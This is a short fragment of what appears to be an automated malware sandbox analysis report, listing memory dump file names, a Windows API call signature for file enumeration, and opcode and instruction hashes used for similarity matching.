                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d0a0d6473ef319fe7482fb16661452ee0f5cc9396202abbb9a3ef01e5212ba74
                                • Instruction ID: 0b9f0127210b003328d9d12ff5e4bf737aeb0ab5979d54c27a671c9daf14195f
                                • Opcode Fuzzy Hash: d0a0d6473ef319fe7482fb16661452ee0f5cc9396202abbb9a3ef01e5212ba74
                                • Instruction Fuzzy Hash: 2D21A0B6A0031897C764F770EC46EEE377CA754300F005694B699A3185DE7596C8CF91